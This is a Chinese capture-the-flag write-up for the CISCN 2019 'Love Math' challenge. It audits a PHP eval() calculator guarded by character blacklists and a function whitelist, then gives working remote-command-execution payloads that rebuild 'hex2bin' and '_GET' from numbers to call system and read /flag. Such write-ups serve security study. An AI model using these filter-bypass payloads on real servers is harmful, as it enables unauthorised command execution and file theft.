[CISCN 2019 初赛]Love Math 1

1.介绍

1.1题型rce远程命令漏洞

1.2代码审计

1.3PHP函数

1.4PHP正则匹配

2.步骤

2.1首先进行代码审计

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
} 

 

总体意思为GET传入一个c参数,要求1.长度小于80,2.字符串不能在黑名单内,3.可以输入白名单的函数,然后输出c的参数。

2.2首先,构造payload:?c=system(ls)

2.3因为system,ls在不在白名单中,所有更改一下形式:?c=$_GET[a]($_GET[b])&a=system&b=ls

知识点

1)动态函数

php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数,比如下面的代码会执行 system(‘ls’);

$a='system'; $a('ls');

 

2.4因为对长度限制,我们再更改一下格式?c=$pi=_GET;&&pi{pi}($$pi{abs})&pi=system&abs=ls

2.5因为“_GET”在不在白名单中,c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=ls

base_convert(37907361743,10,36) => "hex2bin"
dechex(1598506324) => "5f474554"
$pi=hex2bin("5f474554") => $pi="_GET"   //hex2bin将一串16进制数转换为二进制字符串
($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs}  //{}可以代替[]

 

 

[CISCN 2019 初赛]Love Math 1

 

 2.6输入payload:c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat%20/flag

[CISCN 2019 初赛]Love Math 1

 

 3.借鉴

(40条消息) [CISCN 2019 初赛]Love Math_sm1rk的博客-CSDN博客

(40条消息) [CISCN 2019 初赛]Love Math_羽的博客-CSDN博客

刷题记录:[CISCN 2019 初赛]Love Math - MustaphaMond - 博客园 (cnblogs.com)

 

 

 

 

 

 

 

 

上一篇:html完整语法学习


下一篇:为什么不建议在for循环中使用“+”进行字符串拼接?